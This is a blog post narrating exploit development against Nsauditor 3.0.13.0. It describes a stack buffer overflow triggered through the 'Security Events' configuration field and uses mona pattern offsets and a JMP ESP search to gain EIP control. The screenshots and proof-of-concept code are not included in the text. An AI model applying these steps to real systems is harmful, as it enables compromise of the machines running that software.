We will start here:
Somewhere online I found Nsauditor Version 3.0.13.0. I decided it will be a good example software to check (and exploit - 'if possible'). So I installed the software and I started to...
... simply using the program :) That's the whole case for 'manual approach'. Check it out: when you're using the software, you can always understand a little bit more about how it works and where we can find possible 'entry point' for our 'exploit'.
That's how I found:
To find the same windows: go to Options -> Configuration. Then you will find a tab called "Security Events". Yeah. :) So let's add a new 'security event' just like I did it on the screen:
('initial' crash)
Call stack:
Preparing a skeleton-poc (pattern based on: !mona pc 2000):
Now we should be here:
Checking pattern offset (using: !mona po 0xaddrss):
I modified a skeleton-poc a little bit to verify the length of the pattern used:
Checking results:
So far, so good. (As you can see I changed sh-string length because with 1500*C we can not reach the crash.)
Next thing I decided to do is to find a location of JMP ESP:
Unfortunately !mona found only 7 pointers. All of them started from 0x00 so my super shellcode was malformed. I decided to restart the app, restart debugger, restart OS... but it wasn't the solution. Memory (of found jmp esp) started again and again from 0x00.
After a while I decided to do something else. I restarted ImmunityDbg again and then I used right-click to Search for -> Command:
And that's how I found an address that worked for me:
As you can see modified poc generated new string I used and now we are able to overwrite EIP with jmp esp.
Next I used Shift+F8 in ImmunityDbg to step forward:
I believe it's time to use Shift+F9 ;)
I think that's all for this case. :) Now click donates button and buy me a coffee ;)
Part 1 of the post you can find here.
See you next time!
Cheers
Brak komentarzy:
Prześlij komentarz